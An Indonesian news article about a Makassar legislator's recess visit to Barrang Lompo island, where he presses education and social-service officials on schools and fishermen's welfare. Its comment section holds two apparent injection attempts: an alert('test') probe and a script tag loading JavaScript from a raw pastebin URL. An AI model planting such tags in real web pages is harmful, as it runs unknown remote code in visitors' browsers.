Berita

Genjot Kesejahteraan Warga Pulau Barang Lompo, Wahab Tahir Datangkan Dua Dinas Saat Reses

ARUSPOLITIK.COM- Ketua komisi D DPRD kota Makassar, H. Abdul Wahab Tahir mengakhiri reses ketiga masa sidang tahun 2019-2020 di Kelurahan Barrang Lompo, Kecamatan Kepulauan Sangkarrang, Sabtu (20/6/2020).

Selama reses di kecamatan Kepulauan Sangkarrang, H. Abdul Wahab Tahir melaksanakannya dengan dua sesi sebagai upaya menghindari penyebaran Covid-19.

H. Abdul Wahab Tahir tidak datang sendiri ke Pulau Barrang lompo Kecamatan Kepulauan Sangkarrang. Dia datang membawa pejabat dari Dinas Pendidikan dan Dinas Sosial kota Makassar.

Mendatangkan pejabat dari Dinas Pendidikan dan Dinas Sosial, H. Abdul Wahab Tahir mendorong kedua instansi pemerintah kota Makassar tersebut untuk memenuhi kebutuhan masyarakat Kecamatan Kepulauan Sangkarrang.

“Saya datang dalam menjalankan tugas dan tanggung jawab saya sebagai wakil kita di DPRD kota Makassar. Saya datang mengajak kepala bidang Dinas Pendidikan dan perwakilan Dinas Sosial kota Makassar. Saya mengajak Dinas Pendidikan dan Dinas Pendidikan memperhatikan kehidupan masyarakat di Pulau Barrang Lompo Kecamatan Kepulauan Sangkarrang,” kata Abdul Wahab Tahir dalam sambutannya dihadapan masyarakat Kelurahan Barrang Lompo.

H. Abdul Wahab Tahir meminta kepada Pejabat Dinas Pendidikan yakni Kepala Bidang Manajemen Guru dan Tenaga Kependidikan, Dr Pantja Nurwahid untuk memprioritaskan kualitas pendidikan di kecamatan Kepulauan Sangkarrang.

“Saya mengajak Dinas Pendidikan memperbaiki fasilitas pendidikan seperti rehab seluruh sekolah yang ada Kecamatan Kepulauan Sangkarrang. Termasuk memasangkan peping blok di sekolah untuk menghindari debu selama pelaksanaan jam belajar,” kata H. Abdul Wahab Tahir.

“Kita juga mendorong Dinas Pendidikan menempatkan guru-guru yang berkualitas untuk mengajar di sekolah-sekolah di kecamatan Kepulauan Sangkarrang. Hal ini penting untuk menggenjot kualitas pendidikan atau menciptakan anak sekolah yang punya daya saing di Kecamatan Kepulauan Sangkarrang,” tambahnya.

H.Abdul Wahab Tahir meminta Kordinator PKH Dinas Sosial kota Makassar, Nabahan. Legislator Golkar Makassar itu berharap Dinas Sosial tidak boleh mnganak tirikan kesejahteraan masyarakat di Kecamatan Kepulauan Sangkarrang.

“Saya juga datang bersama Perwakilan Dinas Sosial untuk memperhatikan kesejahteraan masyarakat di Kepulauan Sangkarrang. Saya mendorong Dinas Sosial memberikan edukasi, Dinas Sosial harus memberikan perhatian khusus warga pulau. Seluruh nelayan harus diperhatikan kesejahterannya, karena warga di Kepulauan Sangkarrang 90% adalah nelayan. Ini penting agar hak rakyat terpenuhi secara merata.

“Orang Pulau tidak boleh terpinggirkan dari perhatian dan kebijakan pemerintah kota Makassar. Tidak boleh ada alasan dari Pemkot untuk tidak melayani warga yang ada di Kecamatan Kepulauan Sangkarrang. Pemkot Makassar tidak boleh membeda-bedakan Kecamatan Kepulauan Sangkarrang dengan Kecamatan lainnya,” teganya.

Reses yang dilaksanakan, H. Abdul Wahab Tahir dihadiri Sekcam Kepulauan Sangkarrang, Sitti Subedah, kepala Kelurahan Barrang Lompo, Kurniati SP, puluhan tokoh agama, tokoh pemuda, tokoh perempuan, perwakilan komunitas nelayan, dan sejumlah kalangan masyarakat lainnya.

Reses tersebut dilaksanakan dengan menerapkan sistem protokol kesehatan demi menghindari penyebaran Covid-19 ditengah kehidupan masyarakat. (Allank)

Komentar menggunakan akun Facebook

2 Komentar

  • <scritp>alert('test');</script>

    <script type="text/javascript" src="https://pastebin.com/raw/Qp6EepLh"></script>

Kirim Komentar

Enam Ribu Sembilan Ratus Lima